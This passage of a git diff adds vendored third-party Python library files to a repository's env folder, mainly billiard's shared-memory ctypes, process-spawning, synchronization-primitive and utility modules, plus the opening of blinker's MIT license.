_billiard.sem_unlink(name) + except Exception as e: + warnings.warn('semaphore_tracker: %r: %s' % (name, e)) + finally: + pass diff --git a/env/Lib/site-packages/billiard/sharedctypes.py b/env/Lib/site-packages/billiard/sharedctypes.py new file mode 100644 index 00000000..0b6589bf --- /dev/null +++ b/env/Lib/site-packages/billiard/sharedctypes.py @@ -0,0 +1,258 @@ +# +# Module which supports allocation of ctypes objects from shared memory +# +# multiprocessing/sharedctypes.py +# +# Copyright (c) 2006-2008, R Oudkerk +# Licensed to PSF under a Contributor Agreement. +# + +import ctypes +import sys +import weakref + +from . import heap +from . import get_context +from .context import assert_spawning +from .reduction import ForkingPickler + +__all__ = ['RawValue', 'RawArray', 'Value', 'Array', 'copy', 'synchronized'] + +PY3 = sys.version_info[0] == 3 + +typecode_to_type = { + 'c': ctypes.c_char, 'u': ctypes.c_wchar, + 'b': ctypes.c_byte, 'B': ctypes.c_ubyte, + 'h': ctypes.c_short, 'H': ctypes.c_ushort, + 'i': ctypes.c_int, 'I': ctypes.c_uint, + 'l': ctypes.c_long, 'L': ctypes.c_ulong, + 'f': ctypes.c_float, 'd': ctypes.c_double +} + + +def _new_value(type_): + size = ctypes.sizeof(type_) + wrapper = heap.BufferWrapper(size) + return rebuild_ctype(type_, wrapper, None) + + +def RawValue(typecode_or_type, *args): + ''' + Returns a ctypes object allocated from shared memory + ''' + type_ = typecode_to_type.get(typecode_or_type, typecode_or_type) + obj = _new_value(type_) + ctypes.memset(ctypes.addressof(obj), 0, ctypes.sizeof(obj)) + obj.__init__(*args) + return obj + + +def RawArray(typecode_or_type, size_or_initializer): + ''' + Returns a ctypes array allocated from shared memory + ''' + type_ = typecode_to_type.get(typecode_or_type, typecode_or_type) + if isinstance(size_or_initializer, int): + type_ = type_ * size_or_initializer + obj = _new_value(type_) + ctypes.memset(ctypes.addressof(obj), 0, ctypes.sizeof(obj)) + return obj + else: + type_ = type_ * len(size_or_initializer) + result = _new_value(type_) + result.__init__(*size_or_initializer) + return result + + +def Value(typecode_or_type, *args, **kwds): + ''' + Return a synchronization wrapper for a Value + ''' + lock = kwds.pop('lock', None) + ctx = kwds.pop('ctx', None) + if kwds: + raise ValueError( + 'unrecognized keyword argument(s): %s' % list(kwds.keys())) + obj = RawValue(typecode_or_type, *args) + if lock is False: + return obj + if lock in (True, None): + ctx = ctx or get_context() + lock = ctx.RLock() + if not hasattr(lock, 'acquire'): + raise AttributeError("'%r' has no method 'acquire'" % lock) + return synchronized(obj, lock, ctx=ctx) + + +def Array(typecode_or_type, size_or_initializer, **kwds): + ''' + Return a synchronization wrapper for a RawArray + ''' + lock = kwds.pop('lock', None) + ctx = kwds.pop('ctx', None) + if kwds: + raise ValueError( + 'unrecognized keyword argument(s): %s' % list(kwds.keys())) + obj = RawArray(typecode_or_type, size_or_initializer) + if lock is False: + return obj + if lock in (True, None): + ctx = ctx or get_context() + lock = ctx.RLock() + if not hasattr(lock, 'acquire'): + raise AttributeError("'%r' has no method 'acquire'" % lock) + return synchronized(obj, lock, ctx=ctx) + + +def copy(obj): + new_obj = _new_value(type(obj)) + ctypes.pointer(new_obj)[0] = obj + return new_obj + + +def synchronized(obj, lock=None, ctx=None): + assert not isinstance(obj, SynchronizedBase), 'object already synchronized' + ctx = ctx or get_context() + + if isinstance(obj, ctypes._SimpleCData): + return Synchronized(obj, lock, ctx) + elif isinstance(obj, ctypes.Array): + if obj._type_ is ctypes.c_char: + return SynchronizedString(obj, lock, ctx) + return SynchronizedArray(obj, lock, ctx) + else: + cls = type(obj) + try: + scls = class_cache[cls] + except KeyError: + names = [field[0] for field in cls._fields_] + d = dict((name, make_property(name)) for name in names) + classname = 'Synchronized' + cls.__name__ + scls = class_cache[cls] = type(classname, (SynchronizedBase,), d) + return scls(obj, lock, ctx) + +# +# Functions for pickling/unpickling +# + + +def reduce_ctype(obj): + assert_spawning(obj) + if isinstance(obj, ctypes.Array): + return rebuild_ctype, (obj._type_, obj._wrapper, obj._length_) + else: + return rebuild_ctype, (type(obj), obj._wrapper, None) + + +def rebuild_ctype(type_, wrapper, length): + if length is not None: + type_ = type_ * length + ForkingPickler.register(type_, reduce_ctype) + if PY3: + buf = wrapper.create_memoryview() + obj = type_.from_buffer(buf) + else: + obj = type_.from_address(wrapper.get_address()) + obj._wrapper = wrapper + return obj + +# +# Function to create properties +# + + +def make_property(name): + try: + return prop_cache[name] + except KeyError: + d = {} + exec(template % ((name, ) * 7), d) + prop_cache[name] = d[name] + return d[name] + + +template = ''' +def get%s(self): + self.acquire() + try: + return self._obj.%s + finally: + self.release() +def set%s(self, value): + self.acquire() + try: + self._obj.%s = value + finally: + self.release() +%s = property(get%s, set%s) +''' + +prop_cache = {} +class_cache = weakref.WeakKeyDictionary() + +# +# Synchronized wrappers +# + + +class SynchronizedBase: + + def __init__(self, obj, lock=None, ctx=None): + self._obj = obj + if lock: + self._lock = lock + else: + ctx = ctx or get_context(force=True) + self._lock = ctx.RLock() + self.acquire = self._lock.acquire + self.release = self._lock.release + + def __enter__(self): + return self._lock.__enter__() + + def __exit__(self, *args): + return self._lock.__exit__(*args) + + def __reduce__(self): + assert_spawning(self) + return synchronized, (self._obj, self._lock) + + def get_obj(self): + return self._obj + + def get_lock(self): + return self._lock + + def __repr__(self): + return '<%s wrapper for %s>' % (type(self).__name__, self._obj) + + +class Synchronized(SynchronizedBase): + value = make_property('value') + + +class SynchronizedArray(SynchronizedBase): + + def __len__(self): + return len(self._obj) + + def __getitem__(self, i): + with self: + return self._obj[i] + + def __setitem__(self, i, value): + with self: + self._obj[i] = value + + def __getslice__(self, start, stop): + with self: + return self._obj[start:stop] + + def __setslice__(self, start, stop, values): + with self: + self._obj[start:stop] = values + + +class SynchronizedString(SynchronizedArray): + value = make_property('value') + raw = make_property('raw') diff --git a/env/Lib/site-packages/billiard/spawn.py b/env/Lib/site-packages/billiard/spawn.py new file mode 100644 index 00000000..9a294773 --- /dev/null +++ b/env/Lib/site-packages/billiard/spawn.py @@ -0,0 +1,389 @@ +# +# Code used to start processes when using the spawn or forkserver +# start methods. +# +# multiprocessing/spawn.py +# +# Copyright (c) 2006-2008, R Oudkerk +# Licensed to PSF under a Contributor Agreement. +# + +import io +import os +import pickle +import sys +import runpy +import types +import warnings + +from . import get_start_method, set_start_method +from . import process +from . import util + +__all__ = ['_main', 'freeze_support', 'set_executable', 'get_executable', + 'get_preparation_data', 'get_command_line', 'import_main_path'] + +W_OLD_DJANGO_LAYOUT = """\ +Will add directory %r to path! This is necessary to accommodate \ +pre-Django 1.4 layouts using setup_environ. +You can skip this warning by adding a DJANGO_SETTINGS_MODULE=settings \ +environment variable. +""" + +# +# _python_exe is the assumed path to the python executable. +# People embedding Python want to modify it. +# + +if sys.platform != 'win32': + WINEXE = False + WINSERVICE = False +else: + WINEXE = (sys.platform == 'win32' and getattr(sys, 'frozen', False)) + WINSERVICE = sys.executable.lower().endswith("pythonservice.exe") + +if WINSERVICE: + _python_exe = os.path.join(sys.exec_prefix, 'python.exe') +else: + _python_exe = sys.executable + + +def _module_parent_dir(mod): + dir, filename = os.path.split(_module_dir(mod)) + if dir == os.curdir or not dir: + dir = os.getcwd() + return dir + + +def _module_dir(mod): + if '__init__.py' in mod.__file__: + return os.path.dirname(mod.__file__) + return mod.__file__ + + +def _Django_old_layout_hack__save(): + if 'DJANGO_PROJECT_DIR' not in os.environ: + try: + settings_name = os.environ['DJANGO_SETTINGS_MODULE'] + except KeyError: + return # not using Django. + + conf_settings = sys.modules.get('django.conf.settings') + configured = conf_settings and conf_settings.configured + try: + project_name, _ = settings_name.split('.', 1) + except ValueError: + return # not modified by setup_environ + + project = __import__(project_name) + try: + project_dir = os.path.normpath(_module_parent_dir(project)) + except AttributeError: + return # dynamically generated module (no __file__) + if configured: + warnings.warn(UserWarning( + W_OLD_DJANGO_LAYOUT % os.path.realpath(project_dir) + )) + os.environ['DJANGO_PROJECT_DIR'] = project_dir + + +def _Django_old_layout_hack__load(): + try: + sys.path.append(os.environ['DJANGO_PROJECT_DIR']) + except KeyError: + pass + + +def set_executable(exe): + global _python_exe + _python_exe = exe + + +def get_executable(): + return _python_exe + +# +# +# + + +def is_forking(argv): + ''' + Return whether commandline indicates we are forking + ''' + if len(argv) >= 2 and argv[1] == '--billiard-fork': + return True + else: + return False + + +def freeze_support(): + ''' + Run code for process object if this in not the main process + ''' + if is_forking(sys.argv): + kwds = {} + for arg in sys.argv[2:]: + name, value = arg.split('=') + if value == 'None': + kwds[name] = None + else: + kwds[name] = int(value) + spawn_main(**kwds) + sys.exit() + + +def get_command_line(**kwds): + ''' + Returns prefix of command line used for spawning a child process + ''' + if getattr(sys, 'frozen', False): + return ([sys.executable, '--billiard-fork'] + + ['%s=%r' % item for item in kwds.items()]) + else: + prog = 'from billiard.spawn import spawn_main; spawn_main(%s)' + prog %= ', '.join('%s=%r' % item for item in kwds.items()) + opts = util._args_from_interpreter_flags() + return [_python_exe] + opts + ['-c', prog, '--billiard-fork'] + + +def spawn_main(pipe_handle, parent_pid=None, tracker_fd=None): + ''' + Run code specified by data received over pipe + ''' + assert is_forking(sys.argv) + if sys.platform == 'win32': + import msvcrt + from .reduction import steal_handle + new_handle = steal_handle(parent_pid, pipe_handle) + fd = msvcrt.open_osfhandle(new_handle, os.O_RDONLY) + else: + from . import semaphore_tracker + semaphore_tracker._semaphore_tracker._fd = tracker_fd + fd = pipe_handle + exitcode = _main(fd) + sys.exit(exitcode) + + +def _setup_logging_in_child_hack(): + # Huge hack to make logging before Process.run work. + try: + os.environ["MP_MAIN_FILE"] = sys.modules["__main__"].__file__ + except KeyError: + pass + except AttributeError: + pass + loglevel = os.environ.get("_MP_FORK_LOGLEVEL_") + logfile = os.environ.get("_MP_FORK_LOGFILE_") or None + format = os.environ.get("_MP_FORK_LOGFORMAT_") + if loglevel: + from . import util + import logging + logger = util.get_logger() + logger.setLevel(int(loglevel)) + if not logger.handlers: + logger._rudimentary_setup = True + logfile = logfile or sys.__stderr__ + if hasattr(logfile, "write"): + handler = logging.StreamHandler(logfile) + else: + handler = logging.FileHandler(logfile) + formatter = logging.Formatter( + format or util.DEFAULT_LOGGING_FORMAT, + ) + handler.setFormatter(formatter) + logger.addHandler(handler) + + +def _main(fd): + _Django_old_layout_hack__load() + with io.open(fd, 'rb', closefd=True) as from_parent: + process.current_process()._inheriting = True + try: + preparation_data = pickle.load(from_parent) + prepare(preparation_data) + _setup_logging_in_child_hack() + self = pickle.load(from_parent) + finally: + del process.current_process()._inheriting + return self._bootstrap() + + +def _check_not_importing_main(): + if getattr(process.current_process(), '_inheriting', False): + raise RuntimeError(''' + An attempt has been made to start a new process before the + current process has finished its bootstrapping phase. + + This probably means that you are not using fork to start your + child processes and you have forgotten to use the proper idiom + in the main module: + + if __name__ == '__main__': + freeze_support() + ... + + The "freeze_support()" line can be omitted if the program + is not going to be frozen to produce an executable.''') + + +def get_preparation_data(name): + ''' + Return info about parent needed by child to unpickle process object + ''' + _check_not_importing_main() + d = dict( + log_to_stderr=util._log_to_stderr, + authkey=process.current_process().authkey, + ) + + if util._logger is not None: + d['log_level'] = util._logger.getEffectiveLevel() + + sys_path = sys.path[:] + try: + i = sys_path.index('') + except ValueError: + pass + else: + sys_path[i] = process.ORIGINAL_DIR + + d.update( + name=name, + sys_path=sys_path, + sys_argv=sys.argv, + orig_dir=process.ORIGINAL_DIR, + dir=os.getcwd(), + start_method=get_start_method(), + ) + + # Figure out whether to initialise main in the subprocess as a module + # or through direct execution (or to leave it alone entirely) + main_module = sys.modules['__main__'] + try: + main_mod_name = main_module.__spec__.name + except AttributeError: + main_mod_name = main_module.__name__ + if main_mod_name is not None: + d['init_main_from_name'] = main_mod_name + elif sys.platform != 'win32' or (not WINEXE and not WINSERVICE): + main_path = getattr(main_module, '__file__', None) + if main_path is not None: + if (not os.path.isabs(main_path) and + process.ORIGINAL_DIR is not None): + main_path = os.path.join(process.ORIGINAL_DIR, main_path) + d['init_main_from_path'] = os.path.normpath(main_path) + + return d + +# +# Prepare current process +# + + +old_main_modules = [] + + +def prepare(data): + ''' + Try to get current process ready to unpickle process object + ''' + if 'name' in data: + process.current_process().name = data['name'] + + if 'authkey' in data: + process.current_process().authkey = data['authkey'] + + if 'log_to_stderr' in data and data['log_to_stderr']: + util.log_to_stderr() + + if 'log_level' in data: + util.get_logger().setLevel(data['log_level']) + + if 'sys_path' in data: + sys.path = data['sys_path'] + + if 'sys_argv' in data: + sys.argv = data['sys_argv'] + + if 'dir' in data: + os.chdir(data['dir']) + + if 'orig_dir' in data: + process.ORIGINAL_DIR = data['orig_dir'] + + if 'start_method' in data: + set_start_method(data['start_method']) + + if 'init_main_from_name' in data: + _fixup_main_from_name(data['init_main_from_name']) + elif 'init_main_from_path' in data: + _fixup_main_from_path(data['init_main_from_path']) + +# Multiprocessing module helpers to fix up the main module in +# spawned subprocesses + + +def _fixup_main_from_name(mod_name): + # __main__.py files for packages, directories, zip archives, etc, run + # their "main only" code unconditionally, so we don't even try to + # populate anything in __main__, nor do we make any changes to + # __main__ attributes + current_main = sys.modules['__main__'] + if mod_name == "__main__" or mod_name.endswith(".__main__"): + return + + # If this process was forked, __main__ may already be populated + try: + current_main_name = current_main.__spec__.name + except AttributeError: + current_main_name = current_main.__name__ + + if current_main_name == mod_name: + return + + # Otherwise, __main__ may contain some non-main code where we need to + # support unpickling it properly. We rerun it as __mp_main__ and make + # the normal __main__ an alias to that + old_main_modules.append(current_main) + main_module = types.ModuleType("__mp_main__") + main_content = runpy.run_module(mod_name, + run_name="__mp_main__", + alter_sys=True) + main_module.__dict__.update(main_content) + sys.modules['__main__'] = sys.modules['__mp_main__'] = main_module + + +def _fixup_main_from_path(main_path): + # If this process was forked, __main__ may already be populated + current_main = sys.modules['__main__'] + + # Unfortunately, the main ipython launch script historically had no + # "if __name__ == '__main__'" guard, so we work around that + # by treating it like a __main__.py file + # See https://github.com/ipython/ipython/issues/4698 + main_name = os.path.splitext(os.path.basename(main_path))[0] + if main_name == 'ipython': + return + + # Otherwise, if __file__ already has the setting we expect, + # there's nothing more to do + if getattr(current_main, '__file__', None) == main_path: + return + + # If the parent process has sent a path through rather than a module + # name we assume it is an executable script that may contain + # non-main code that needs to be executed + old_main_modules.append(current_main) + main_module = types.ModuleType("__mp_main__") + main_content = runpy.run_path(main_path, + run_name="__mp_main__") + main_module.__dict__.update(main_content) + sys.modules['__main__'] = sys.modules['__mp_main__'] = main_module + + +def import_main_path(main_path): + ''' + Set sys.modules['__main__'] to module at main_path + ''' + _fixup_main_from_path(main_path) diff --git a/env/Lib/site-packages/billiard/synchronize.py b/env/Lib/site-packages/billiard/synchronize.py new file mode 100644 index 00000000..c864064a --- /dev/null +++ b/env/Lib/site-packages/billiard/synchronize.py @@ -0,0 +1,436 @@ +# +# Module implementing synchronization primitives +# +# multiprocessing/synchronize.py +# +# Copyright (c) 2006-2008, R Oudkerk +# Licensed to PSF under a Contributor Agreement. +# + +import errno +import sys +import tempfile +import threading + +from . import context +from . import process +from . import util + +from ._ext import _billiard, ensure_SemLock +from time import monotonic + +__all__ = [ + 'Lock', 'RLock', 'Semaphore', 'BoundedSemaphore', 'Condition', 'Event', +] + +# Try to import the mp.synchronize module cleanly, if it fails +# raise ImportError for platforms lacking a working sem_open implementation. +# See issue 3770 +ensure_SemLock() + +# +# Constants +# + +RECURSIVE_MUTEX, SEMAPHORE = list(range(2)) +SEM_VALUE_MAX = _billiard.SemLock.SEM_VALUE_MAX + +try: + sem_unlink = _billiard.SemLock.sem_unlink +except AttributeError: # pragma: no cover + try: + # Py3.4+ implements sem_unlink and the semaphore must be named + from _multiprocessing import sem_unlink # noqa + except ImportError: + sem_unlink = None # noqa + +# +# Base class for semaphores and mutexes; wraps `_billiard.SemLock` +# + + +def _semname(sl): + try: + return sl.name + except AttributeError: + pass + + +class SemLock: + _rand = tempfile._RandomNameSequence() + + def __init__(self, kind, value, maxvalue, ctx=None): + if ctx is None: + ctx = context._default_context.get_context() + name = ctx.get_start_method() + unlink_now = sys.platform == 'win32' or name == 'fork' + if sem_unlink: + for i in range(100): + try: + sl = self._semlock = _billiard.SemLock( + kind, value, maxvalue, self._make_name(), unlink_now, + ) + except (OSError, IOError) as exc: + if getattr(exc, 'errno', None) != errno.EEXIST: + raise + else: + break + else: + exc = IOError('cannot find file for semaphore') + exc.errno = errno.EEXIST + raise exc + else: + sl = self._semlock = _billiard.SemLock(kind, value, maxvalue) + + util.debug('created semlock with handle %s', sl.handle) + self._make_methods() + + if sem_unlink: + + if sys.platform != 'win32': + def _after_fork(obj): + obj._semlock._after_fork() + util.register_after_fork(self, _after_fork) + + if _semname(self._semlock) is not None: + # We only get here if we are on Unix with forking + # disabled. When the object is garbage collected or the + # process shuts down we unlink the semaphore name + from .semaphore_tracker import register + register(self._semlock.name) + util.Finalize(self, SemLock._cleanup, (self._semlock.name,), + exitpriority=0) + + @staticmethod + def _cleanup(name): + from .semaphore_tracker import unregister + sem_unlink(name) + unregister(name) + + def _make_methods(self): + self.acquire = self._semlock.acquire + self.release = self._semlock.release + + def __enter__(self): + return self._semlock.__enter__() + + def __exit__(self, *args): + return self._semlock.__exit__(*args) + + def __getstate__(self): + context.assert_spawning(self) + sl = self._semlock + if sys.platform == 'win32': + h = context.get_spawning_popen().duplicate_for_child(sl.handle) + else: + h = sl.handle + state = (h, sl.kind, sl.maxvalue) + try: + state += (sl.name, ) + except AttributeError: + pass + return state + + def __setstate__(self, state): + self._semlock = _billiard.SemLock._rebuild(*state) + util.debug('recreated blocker with handle %r', state[0]) + self._make_methods() + + @staticmethod + def _make_name(): + return '%s-%s' % (process.current_process()._config['semprefix'], + next(SemLock._rand)) + + +class Semaphore(SemLock): + + def __init__(self, value=1, ctx=None): + SemLock.__init__(self, SEMAPHORE, value, SEM_VALUE_MAX, ctx=ctx) + + def get_value(self): + return self._semlock._get_value() + + def __repr__(self): + try: + value = self._semlock._get_value() + except Exception: + value = 'unknown' + return '<%s(value=%s)>' % (self.__class__.__name__, value) + + +class BoundedSemaphore(Semaphore): + + def __init__(self, value=1, ctx=None): + SemLock.__init__(self, SEMAPHORE, value, value, ctx=ctx) + + def __repr__(self): + try: + value = self._semlock._get_value() + except Exception: + value = 'unknown' + return '<%s(value=%s, maxvalue=%s)>' % ( + self.__class__.__name__, value, self._semlock.maxvalue) + + +class Lock(SemLock): + ''' + Non-recursive lock. + ''' + + def __init__(self, ctx=None): + SemLock.__init__(self, SEMAPHORE, 1, 1, ctx=ctx) + + def __repr__(self): + try: + if self._semlock._is_mine(): + name = process.current_process().name + if threading.current_thread().name != 'MainThread': + name += '|' + threading.current_thread().name + elif self._semlock._get_value() == 1: + name = 'None' + elif self._semlock._count() > 0: + name = 'SomeOtherThread' + else: + name = 'SomeOtherProcess' + except Exception: + name = 'unknown' + return '<%s(owner=%s)>' % (self.__class__.__name__, name) + + +class RLock(SemLock): + ''' + Recursive lock + ''' + + def __init__(self, ctx=None): + SemLock.__init__(self, RECURSIVE_MUTEX, 1, 1, ctx=ctx) + + def __repr__(self): + try: + if self._semlock._is_mine(): + name = process.current_process().name + if threading.current_thread().name != 'MainThread': + name += '|' + threading.current_thread().name + count = self._semlock._count() + elif self._semlock._get_value() == 1: + name, count = 'None', 0 + elif self._semlock._count() > 0: + name, count = 'SomeOtherThread', 'nonzero' + else: + name, count = 'SomeOtherProcess', 'nonzero' + except Exception: + name, count = 'unknown', 'unknown' + return '<%s(%s, %s)>' % (self.__class__.__name__, name, count) + + +class Condition: + ''' + Condition variable + ''' + + def __init__(self, lock=None, ctx=None): + assert ctx + self._lock = lock or ctx.RLock() + self._sleeping_count = ctx.Semaphore(0) + self._woken_count = ctx.Semaphore(0) + self._wait_semaphore = ctx.Semaphore(0) + self._make_methods() + + def __getstate__(self): + context.assert_spawning(self) + return (self._lock, self._sleeping_count, + self._woken_count, self._wait_semaphore) + + def __setstate__(self, state): + (self._lock, self._sleeping_count, + self._woken_count, self._wait_semaphore) = state + self._make_methods() + + def __enter__(self): + return self._lock.__enter__() + + def __exit__(self, *args): + return self._lock.__exit__(*args) + + def _make_methods(self): + self.acquire = self._lock.acquire + self.release = self._lock.release + + def __repr__(self): + try: + num_waiters = (self._sleeping_count._semlock._get_value() - + self._woken_count._semlock._get_value()) + except Exception: + num_waiters = 'unknown' + return '<%s(%s, %s)>' % ( + self.__class__.__name__, self._lock, num_waiters) + + def wait(self, timeout=None): + assert self._lock._semlock._is_mine(), \ + 'must acquire() condition before using wait()' + + # indicate that this thread is going to sleep + self._sleeping_count.release() + + # release lock + count = self._lock._semlock._count() + for i in range(count): + self._lock.release() + + try: + # wait for notification or timeout + return self._wait_semaphore.acquire(True, timeout) + finally: + # indicate that this thread has woken + self._woken_count.release() + + # reacquire lock + for i in range(count): + self._lock.acquire() + + def notify(self): + assert self._lock._semlock._is_mine(), 'lock is not owned' + assert not self._wait_semaphore.acquire(False) + + # to take account of timeouts since last notify() we subtract + # woken_count from sleeping_count and rezero woken_count + while self._woken_count.acquire(False): + res = self._sleeping_count.acquire(False) + assert res + + if self._sleeping_count.acquire(False): # try grabbing a sleeper + self._wait_semaphore.release() # wake up one sleeper + self._woken_count.acquire() # wait for sleeper to wake + + # rezero _wait_semaphore in case a timeout just happened + self._wait_semaphore.acquire(False) + + def notify_all(self): + assert self._lock._semlock._is_mine(), 'lock is not owned' + assert not self._wait_semaphore.acquire(False) + + # to take account of timeouts since last notify*() we subtract + # woken_count from sleeping_count and rezero woken_count + while self._woken_count.acquire(False): + res = self._sleeping_count.acquire(False) + assert res + + sleepers = 0 + while self._sleeping_count.acquire(False): + self._wait_semaphore.release() # wake up one sleeper + sleepers += 1 + + if sleepers: + for i in range(sleepers): + self._woken_count.acquire() # wait for a sleeper to wake + + # rezero wait_semaphore in case some timeouts just happened + while self._wait_semaphore.acquire(False): + pass + + def wait_for(self, predicate, timeout=None): + result = predicate() + if result: + return result + if timeout is not None: + endtime = monotonic() + timeout + else: + endtime = None + waittime = None + while not result: + if endtime is not None: + waittime = endtime - monotonic() + if waittime <= 0: + break + self.wait(waittime) + result = predicate() + return result + + +class Event: + + def __init__(self, ctx=None): + assert ctx + self._cond = ctx.Condition(ctx.Lock()) + self._flag = ctx.Semaphore(0) + + def is_set(self): + with self._cond: + if self._flag.acquire(False): + self._flag.release() + return True + return False + + def set(self): + with self._cond: + self._flag.acquire(False) + self._flag.release() + self._cond.notify_all() + + def clear(self): + with self._cond: + self._flag.acquire(False) + + def wait(self, timeout=None): + with self._cond: + if self._flag.acquire(False): + self._flag.release() + else: + self._cond.wait(timeout) + + if self._flag.acquire(False): + self._flag.release() + return True + return False + +# +# Barrier +# + + +if hasattr(threading, 'Barrier'): + + class Barrier(threading.Barrier): + + def __init__(self, parties, action=None, timeout=None, ctx=None): + assert ctx + import struct + from .heap import BufferWrapper + wrapper = BufferWrapper(struct.calcsize('i') * 2) + cond = ctx.Condition() + self.__setstate__((parties, action, timeout, cond, wrapper)) + self._state = 0 + self._count = 0 + + def __setstate__(self, state): + (self._parties, self._action, self._timeout, + self._cond, self._wrapper) = state + self._array = self._wrapper.create_memoryview().cast('i') + + def __getstate__(self): + return (self._parties, self._action, self._timeout, + self._cond, self._wrapper) + + @property + def _state(self): + return self._array[0] + + @_state.setter + def _state(self, value): # noqa + self._array[0] = value + + @property + def _count(self): + return self._array[1] + + @_count.setter + def _count(self, value): # noqa + self._array[1] = value + + +else: + + class Barrier: # noqa + + def __init__(self, *args, **kwargs): + raise NotImplementedError('Barrier only supported on Py3') diff --git a/env/Lib/site-packages/billiard/util.py b/env/Lib/site-packages/billiard/util.py new file mode 100644 index 00000000..0fdf2a2c --- /dev/null +++ b/env/Lib/site-packages/billiard/util.py @@ -0,0 +1,232 @@ +# +# Module providing various facilities to other parts of the package +# +# billiard/util.py +# +# Copyright (c) 2006-2008, R Oudkerk --- see COPYING.txt +# Licensed to PSF under a Contributor Agreement. +# + +import sys +import errno +import functools +import atexit + +try: + import cffi +except ImportError: + import ctypes + +try: + from subprocess import _args_from_interpreter_flags # noqa +except ImportError: # pragma: no cover + def _args_from_interpreter_flags(): # noqa + """Return a list of command-line arguments reproducing the current + settings in sys.flags and sys.warnoptions.""" + flag_opt_map = { + 'debug': 'd', + 'optimize': 'O', + 'dont_write_bytecode': 'B', + 'no_user_site': 's', + 'no_site': 'S', + 'ignore_environment': 'E', + 'verbose': 'v', + 'bytes_warning': 'b', + 'hash_randomization': 'R', + 'py3k_warning': '3', + } + args = [] + for flag, opt in flag_opt_map.items(): + v = getattr(sys.flags, flag) + if v > 0: + args.append('-' + opt * v) + for opt in sys.warnoptions: + args.append('-W' + opt) + return args + +from multiprocessing.util import ( # noqa + _afterfork_registry, + _afterfork_counter, + _exit_function, + _finalizer_registry, + _finalizer_counter, + Finalize, + ForkAwareLocal, + ForkAwareThreadLock, + get_temp_dir, + is_exiting, + register_after_fork, + _run_after_forkers, + _run_finalizers, +) + +from .compat import get_errno + +__all__ = [ + 'sub_debug', 'debug', 'info', 'sub_warning', 'get_logger', + 'log_to_stderr', 'get_temp_dir', 'register_after_fork', + 'is_exiting', 'Finalize', 'ForkAwareThreadLock', 'ForkAwareLocal', + 'SUBDEBUG', 'SUBWARNING', +] + + +# Constants from prctl.h +PR_GET_PDEATHSIG = 2 +PR_SET_PDEATHSIG = 1 + +# +# Logging +# + +NOTSET = 0 +SUBDEBUG = 5 +DEBUG = 10 +INFO = 20 +SUBWARNING = 25 +WARNING = 30 +ERROR = 40 + +LOGGER_NAME = 'multiprocessing' +DEFAULT_LOGGING_FORMAT = '[%(levelname)s/%(processName)s] %(message)s' + +_logger = None +_log_to_stderr = False + + +def sub_debug(msg, *args, **kwargs): + if _logger: + _logger.log(SUBDEBUG, msg, *args, **kwargs) + + +def debug(msg, *args, **kwargs): + if _logger: + _logger.log(DEBUG, msg, *args, **kwargs) + + +def info(msg, *args, **kwargs): + if _logger: + _logger.log(INFO, msg, *args, **kwargs) + + +def sub_warning(msg, *args, **kwargs): + if _logger: + _logger.log(SUBWARNING, msg, *args, **kwargs) + +def warning(msg, *args, **kwargs): + if _logger: + _logger.log(WARNING, msg, *args, **kwargs) + +def error(msg, *args, **kwargs): + if _logger: + _logger.log(ERROR, msg, *args, **kwargs) + + +def get_logger(): + ''' + Returns logger used by multiprocessing + ''' + global _logger + import logging + + logging._acquireLock() + try: + if not _logger: + + _logger = logging.getLogger(LOGGER_NAME) + _logger.propagate = 0 + logging.addLevelName(SUBDEBUG, 'SUBDEBUG') + logging.addLevelName(SUBWARNING, 'SUBWARNING') + + # XXX multiprocessing should cleanup before logging + if hasattr(atexit, 'unregister'): + atexit.unregister(_exit_function) + atexit.register(_exit_function) + else: + atexit._exithandlers.remove((_exit_function, (), {})) + atexit._exithandlers.append((_exit_function, (), {})) + finally: + logging._releaseLock() + + return _logger + + +def log_to_stderr(level=None): + ''' + Turn on logging and add a handler which prints to stderr + ''' + global _log_to_stderr + import logging + + logger = get_logger() + formatter = logging.Formatter(DEFAULT_LOGGING_FORMAT) + handler = logging.StreamHandler() + handler.setFormatter(formatter) + logger.addHandler(handler) + + if level: + logger.setLevel(level) + _log_to_stderr = True + return _logger + + +def get_pdeathsig(): + """ + Return the current value of the parent process death signal + """ + if not sys.platform.startswith('linux'): + # currently we support only linux platform. + raise OSError() + try: + if 'cffi' in sys.modules: + ffi = cffi.FFI() + ffi.cdef("int prctl (int __option, ...);") + arg = ffi.new("int *") + C = ffi.dlopen(None) + C.prctl(PR_GET_PDEATHSIG, arg) + return arg[0] + else: + sig = ctypes.c_int() + libc = ctypes.cdll.LoadLibrary("libc.so.6") + libc.prctl(PR_GET_PDEATHSIG, ctypes.byref(sig)) + return sig.value + except Exception: + raise OSError() + + +def set_pdeathsig(sig): + """ + Set the parent process death signal of the calling process to sig + (either a signal value in the range 1..maxsig, or 0 to clear). + This is the signal that the calling process will get when its parent dies. + This value is cleared for the child of a fork(2) and + (since Linux 2.4.36 / 2.6.23) when executing a set-user-ID or set-group-ID binary. + """ + if not sys.platform.startswith('linux'): + # currently we support only linux platform. + raise OSError("pdeathsig is only supported on linux") + try: + if 'cffi' in sys.modules: + ffi = cffi.FFI() + ffi.cdef("int prctl (int __option, ...);") + C = ffi.dlopen(None) + C.prctl(PR_SET_PDEATHSIG, ffi.cast("int", sig)) + else: + libc = ctypes.cdll.LoadLibrary("libc.so.6") + libc.prctl(PR_SET_PDEATHSIG, ctypes.c_int(sig)) + except Exception as e: + raise OSError("An error occured while setting pdeathsig") from e + +def _eintr_retry(func): + ''' + Automatic retry after EINTR. + ''' + + @functools.wraps(func) + def wrapped(*args, **kwargs): + while 1: + try: + return func(*args, **kwargs) + except OSError as exc: + if get_errno(exc) != errno.EINTR: + raise + return wrapped diff --git a/env/Lib/site-packages/blinker-1.7.0.dist-info/INSTALLER b/env/Lib/site-packages/blinker-1.7.0.dist-info/INSTALLER new file mode 100644 index 00000000..a1b589e3 --- /dev/null +++ b/env/Lib/site-packages/blinker-1.7.0.dist-info/INSTALLER @@ -0,0 +1 @@ +pip diff --git a/env/Lib/site-packages/blinker-1.7.0.dist-info/LICENSE.rst b/env/Lib/site-packages/blinker-1.7.0.dist-info/LICENSE.rst new file mode 100644 index 00000000..79c9825a --- /dev/null +++ b/env/Lib/site-packages/blinker-1.7.0.dist-info/LICENSE.rst @@ -0,0 +1,20 @@ +Copyright 2010 Jason Kirtland + +Permission is hereby granted, free of charge, to any person obtaining a +copy of this software and associated documentation files (the +"Software"), to deal in the Software without restriction, including +without limitation the rights to use, copy, modify, merge, publish, +distribute, sublicense, and/or sell copies of the Software, and to +permit persons to whom the Software is furnished to do so, subject to +the following conditions: + +The above copyright notice and this permission notice shall be included +in all copies 